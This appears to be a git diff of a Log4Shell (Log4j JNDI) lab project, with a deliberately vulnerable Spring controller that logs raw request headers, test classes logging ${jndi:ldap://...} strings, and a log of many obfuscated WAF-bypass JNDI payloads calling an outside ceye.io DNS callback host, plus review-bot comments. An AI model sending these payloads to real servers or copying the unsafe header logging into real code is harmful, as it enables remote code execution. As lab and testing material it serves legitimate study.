ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.ldY20.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.YGL21.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.ldY30.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.YGL31.hpdth2.ceye.io/user} +2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7deCv%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jn%24%7benv::-%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dSmj%24%7b::-.%7d2%24%7b::-.%7d2%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMZw$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMZw%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dSmj$%7b::-.%7d3$%7b::-.%7d2$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7bsys:k5:-nD%7d%24%7blower:i%24%7bweb:k5:-:%7d%7ddns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7d98G%24%7b::-.%7d2%24%7b::-.%7d3%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36nD%7d$%7blower:i$%7bweb:k5:-:%7d%7ddns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7d98G$%7b::-.%7d3$%7b::-.%7d3$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{%24{%24{::-j}%24{::-n}%24{::-d}%24{::-i}:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMds%24%7b::-.%7d2%24%7b::-.%7d4%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${${${::-j}${::-n}${::-d}${::-i}:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMds$%7b::-.%7d3$%7b::-.%7d4$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7deCv$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.2Wf20.hpdth2.ceye.io/%20user} +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.2Wf30.hpdth2.ceye.io/%20user} +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.Ue320.hpdth2.ceye.io/%20user} +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.Ue330.hpdth2.ceye.io/%20user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.Q0a21.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.49C20.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR 
com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.49C30.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.Q0a31.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.T3s21.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.De620.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.De630.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.T3s31.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: 
null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.cKd20.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.ShD21.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.cKd30.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.ShD31.hpdth2.ceye.io/ user} +2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.r8P3.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR 
com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://2.get.127.0.0.1.8005.OPY20.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.ewP21.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://2.get.127.0.0.1.8005.OPY30.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://2.get.127.0.0.1.8005.ewP31.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{jndi:dns://2.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR 
com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${j${::-n}di:dns://2.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} +2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} +2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} +2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:35:42 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} +2025-12-08 14:35:43 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} diff --git a/JNDI/Log4j2/pom.xml b/JNDI/Log4j2/pom.xml new file mode 100644 index 0000000..4440633 --- /dev/null +++ b/JNDI/Log4j2/pom.xml 
@@ -0,0 +1,44 @@ + + + 4.0.0 + + com.test + Log4j2 + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + 2.14.1 + 2.15.0 + + + + + org.apache.logging.log4j + log4j-core + ${log4j2.version1} + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.springframework.boot + spring-boot-starter-logging + + + + + org.aspectj + aspectjweaver + 1.9.4 + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/java/com/example/App.java b/JNDI/Log4j2/src/main/java/com/example/App.java new file mode 100644 index 0000000..469545a --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/App.java @@ -0,0 +1,35 @@ +package com.example; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; + +public class App { + private static final Logger logger = LogManager.getLogger(App.class); + + public static void main(String[] args) { + /* 临时修改记录的日志等级 */ + Configurator.setLevel("com.example.App", Level.DEBUG); + + String username = "${sys:user.name}"; + String str2 = "${sys:java.version}"; + String vul = "${jndi:ldap://127.0.0.1:50389/b67a28}"; + vul = "${jndi:ldap://127.0.0.1:50389/7df78d}"; +// logger.trace("跟踪信息"); +// logger.debug("调试信息"); +// logger.info("应用启动"); +// logger.warn("警告示例"); +// logger.error("错误示例"); +// logger.fatal("致命错误示例"); +// logger.trace("{}", username); +// logger.info("{}", str2); + logger.info("{}", vul); +// logger.error("{}",vul); + try { + int x = 1 / 0; + } catch (Exception e) { + logger.error("发生异常", e); + } + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java new file mode 100644 index 0000000..7232598 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java 
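Review bot: Two log4j2 version properties are declared (`2.14.1` and `2.15.0`) but only `${log4j2.version1}` is referenced, by the `log4j-core` dependency, so the second property looks like dead configuration; the XML element names are stripped in this rendering, so everything except the `log4j2.version1` reference is inferred. Because the module deliberately pins a log4j-core release that still resolves JNDI lookups from logged messages, the properties deserve a comment naming their roles, e.g. `<!-- log4j2.version1: vulnerable baseline used by the lab; 2.15.0: comparison version with message lookups disabled by default -->`, and the unused one should go if no comparison build exists. The `spring-boot-starter-logging` entry nested under `spring-boot-starter-web` is presumably an exclusion that makes log4j-core the active backend; that intent is also worth a one-line comment.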
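Review bot: `vul` is assigned twice in a row in `main`, so the first literal is a dead store that a reader may mistake for the value being logged; keep only the assignment that is used, `String vul = "${jndi:ldap://127.0.0.1:50389/7df78d}";`. `username` and `str2` are likewise unused once their log statements are commented out, and `int x = 1 / 0;` exists only to raise an exception for the `logger.error("发生异常", e)` call, which a short comment should state (`// force an exception so the throwable-logging path is exercised`). `Configurator.setLevel("com.example.App", Level.DEBUG)` repeats the logger name as a string; `App.class.getName()` keeps it in sync with the `LogManager.getLogger(App.class)` declaration above it.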
@@ -0,0 +1,31 @@
+package com.example;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+
+public class BypassWaf {
+ private static final Logger logger = LogManager.getLogger(BypassWaf.class);
+
+ public static void main(String[] args) {
+// String test5 = "${a:\\-b}";
+// logger.error("{}", test5);
+// String test2 = "${a:\\-b123:-xyz}";
+// logger.error("{}", test2);
+// String test4 = "${a:\\-b123:-xyz:-qwe}";
+// logger.error("{}", test4);
+// String test3 = "${a:-b}";
+// logger.error("{}", test3);
+// String test6 = "${a:-b123:-xyz}";
+// logger.error("{}", test6);
+// String test7 = "${a:b123:-xyz321:-qwe}";
+// logger.error("{}", test7);
+// String test8 = "${sys:java.version:-xyz123}";
+// logger.error("{}", test8);
+// String test1 = "${sys:${a:-j${proto:-a}va.version}}${d:e}";
+// logger.fatal("{}", test1);
+ String host = "ldap://127.0.0.1:50389/b67a28";
+ String vul1 = String.format("${jndi:%s}", host);
+ logger.error("{}", vul1);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java
new file mode 100644
index 0000000..bb2acba
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java
@@ -0,0 +1,11 @@
+package com.example.spring;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class WebApplication {
+ public static void main(String[] args) {
+ SpringApplication.run(WebApplication.class, args);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java
new file mode 100644
index 0000000..955ae0f
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java
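Review bot: Sixteen lines of `main` are commented-out code, which lands in the repository as dead text that is neither compiled nor explained; either delete it (git history keeps it) or replace it with a block comment stating what each lookup form was meant to demonstrate. The live statement `String vul1 = String.format("${jndi:%s}", host);` formats two constants, so a single literal or plain concatenation is clearer than reading `%s` next to `${...}`. A class-level comment stating that `BypassWaf` is a deliberately unsafe log4j-core harness for local testing would tell readers not to reuse the pattern elsewhere.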
@@ -0,0 +1,31 @@
+package com.example.spring.controller;
+
+import com.example.App;
+import org.apache.logging.log4j.Level;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.apache.logging.log4j.core.config.Configurator;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+
+@Controller
+public class IndexController {
+ private static final Logger logger = LogManager.getLogger(IndexController.class);
+
+ @RequestMapping("/")
+ @ResponseBody
+ public String index(@RequestParam(value = "name", defaultValue = "World") String name, HttpServletRequest request) {
+ Configurator.setLevel("com.example.spring.controller.IndexController", Level.DEBUG);
+
+ String referer = request.getHeader("Referer");
+ logger.error("Referer: {}", referer);
+ String header = request.getHeader("User-Agent");
+ logger.error("User-Agent: {}", header);
+// logger.error("Hello, {}", name);
+ return String.format("Hello, %s!", name);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/tmp.java b/JNDI/Log4j2/src/main/java/com/example/tmp.java
new file mode 100644
index 0000000..5d41b57
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/tmp.java
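Review bot: `Configurator.setLevel(...)` inside `index()` rewrites the logger's level in the global configuration on every request, and both log calls that follow are at ERROR, so the DEBUG level never affects them; drop it or move it to a static initializer so the handler has no side effect beyond the logging it exists to exercise. The `com.example.App` import is unused. The two `logger.error` calls on `Referer` and `User-Agent` are the attacker-reachable sink this lab is built around (raw request headers reaching log4j-core 2.14.1 lookups), so mark that intent rather than leaving it indistinguishable from an accident: `// INTENTIONALLY VULNERABLE: untrusted request headers are logged through log4j lookups (Log4Shell lab)`. Note also that `name` is echoed into the response body via `String.format` with no escaping; harmless for a local lab, but a comment saying so prevents this handler from being copied elsewhere as-is.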
@@ -0,0 +1,21 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import javax.naming.InitialContext; +import javax.naming.NamingException; + +public class tmp { + private static final Logger logger = LogManager.getLogger(tmp.class); + + public static void main(String[] args) throws NamingException { +// String url = "ldap://127.0.0.1:50389/7df78d"; +// InitialContext initialContext = new InitialContext(); +// initialContext.lookup(url); + + String message = "${jndi:ldap://127.0.0.1:50389/7df78d}"; + + logger.error("{}", message); + } +} diff --git a/JNDI/Log4j2/src/main/resources/application.yaml b/JNDI/Log4j2/src/main/resources/application.yaml new file mode 100644 index 0000000..ab8fc62 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/application.yaml @@ -0,0 +1,2 @@ +server: + port: 8005 \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/resources/log4j2.xml b/JNDI/Log4j2/src/main/resources/log4j2.xml new file mode 100644 index 0000000..4daec91 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/log4j2.xml @@ -0,0 +1,37 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/MiddleWare/Tomcat/.gitignore b/MiddleWare/Tomcat/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/MiddleWare/Tomcat/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file 
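Review bot: `main` still declares `throws NamingException` although the only `InitialContext.lookup` call is commented out, and the class name `tmp` breaks the UpperCamelCase convention the rest of the package follows. Either restore the direct lookup — it is the clearest way to show that JNDI resolution, not the logging, is the dangerous step, and keeping it next to the `${jndi:...}` log line makes that comparison explicit — or drop the clause and the two `javax.naming` imports: `public static void main(String[] args) {`. If the class is meant to stay in the repo, a name such as `DirectJndiLookup` would describe it; I am inferring its purpose from the commented-out code, so confirm.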
diff --git a/MiddleWare/Tomcat/.idea/.gitignore b/MiddleWare/Tomcat/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/MiddleWare/Tomcat/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/MiddleWare/Tomcat/.idea/encodings.xml b/MiddleWare/Tomcat/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/MiddleWare/Tomcat/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/misc.xml b/MiddleWare/Tomcat/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/vcs.xml 